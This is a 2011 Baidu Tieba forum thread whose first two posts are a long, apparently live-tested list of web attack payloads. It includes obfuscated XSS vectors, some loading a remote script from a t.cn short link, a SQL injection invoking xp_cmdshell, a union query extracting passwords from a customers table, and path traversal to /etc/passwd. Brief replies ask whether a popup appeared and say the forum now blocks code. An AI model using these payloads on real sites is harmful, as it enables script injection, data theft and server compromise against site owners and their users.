wabzsy吧 关注:173贴子:16,470
  • 7回复贴,共1

><script>alert(http://t.cn/SGEbuW)</script>

只看楼主收藏回复


><script>alert(http://t.cn/SGEbuW)</script>
=’><script>alert(http://t.cn/SGEbuW)</script>
<script>alert(http://t.cn/SGEbuW)</script>
<script>alert(vulnerable)</script>
<s&#99;ript>alert(’http://t.cn/SGEbuW’)</script>
<img src="javas&#99;ript:alert(’http://t.cn/SGEbuW’)">
<script>alert(/"http://t.cn/SGEbuW/")</script>.jsp
"
/index.html
?.jsp
?.jsp
&lt;script&gt;alert(’http://t.cn/SGEbuW’);&lt;/script&gt
<script>alert(’http://t.cn/SGEbuW’)</script>
?sql_debug=1
a\.aspx
a.jsp/<script>alert(’http://t.cn/SGEbuW’)</script>
a/
a?<script>alert(’http://t.cn/SGEbuW’)</script>
"><script>alert(’http://t.cn/SGEbuW’)</script>
’;exec master..xp_cmdshell ’dir c: > c:/inetpub/wwwroot/?.txt’--&&
">
&
&SESSION_ID={SESSION_ID}&SESSION_ID=
1 union all select pass,0,0,0,0 from customers where fname=
../../../../../../../../etc/passwd
../../../../../../../../windows/system.ini
/../../../../../../../../windows/system.ini
’’;!--"<http://t.cn/SGEbuW>=&{()}
<IMG SRC="javascript:alert(’http://t.cn/SGEbuW’);">
<IMG SRC=javascript:alert(’http://t.cn/SGEbuW’)>
<IMG SRC=JaVaScRiPt:alert(’http://t.cn/SGEbuW’)>
<IMG SRC=JaVaScRiPt:alert(&quot;http://t.cn/SGEbuW&quot;)>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav&#x09;ascript:alert(’http://t.cn/SGEbuW’);">
I


1楼2011-12-05 18:12回复
    <IMG SRC="jav&#x0A;ascript:alert(’http://t.cn/SGEbuW’);">
    <IMG SRC="jav&#x0D;ascript:alert(’http://t.cn/SGEbuW’);">
    "<IMG SRC=java/0script:alert(/"http://t.cn/SGEbuW/")>";’ > out
    <IMG SRC=" javascript:alert(’http://t.cn/SGEbuW’);">
    <SCRIPT>a=/http://t.cn/SGEbuW/alert(a.source)</SCRIPT>
    <BODY BACKGROUND="javascript:alert(’http://t.cn/SGEbuW’)">
    <BODY ONLOAD=alert(’http://t.cn/SGEbuW’)>
    <IMG DYNSRC="javascript:alert(’http://t.cn/SGEbuW’)">
    <IMG LOWSRC="javascript:alert(’http://t.cn/SGEbuW’)">
    <BGSOUND SRC="javascript:alert(’http://t.cn/SGEbuW’);">
    <br size="&{alert(’http://t.cn/SGEbuW’)}">
    <LAYER SRC="/info/upimg/allimg/080417/0946110.jpg"></SCRIPT>
    <IMG SRC="javascript:alert(’http://t.cn/SGEbuW’)"
    <!--#exec cmd="/bin/echo ’<SCRIPT SRC’"--><!--#exec cmd="/bin/echo ’=http://http://t.cn/SGEbuW></SCRIPT>’"-->
    <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
    <SCRIPT a=">" SRC="http://http://t.cn/SGEbuW"></SCRIPT>
    <SCRIPT =">" SRC="http://http://t.cn/SGEbuW"></SCRIPT>
    <SCRIPT a=">" ’’ SRC="http://http://t.cn/SGEbuW"></SCRIPT>
    <SCRIPT "a=’>’" SRC="http://http://t.cn/SGEbuW"></SCRIPT>
    <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://http://t.cn/SGEbuW"></SCRIPT>
    <A HREF=http://http://t.cn/SGEbuW>link</A>I


    2楼2011-12-05 18:12
    回复
      广告
      立即查看
      怎么感觉你在拿我贴吧做实验捏..


      3楼2011-12-05 18:38
      回复


        4楼2011-12-05 19:37
        回复
          有弹出框框吗


          5楼2011-12-20 22:17
          回复
            = =


            IP属地:北京来自手机贴吧6楼2011-12-20 23:51
            回复
              爪机木反映…


              IP属地:重庆来自手机贴吧7楼2011-12-21 07:40
              回复
                我早就试过了..... 贴吧已经不能搞代码了...


                8楼2011-12-21 08:32
                回复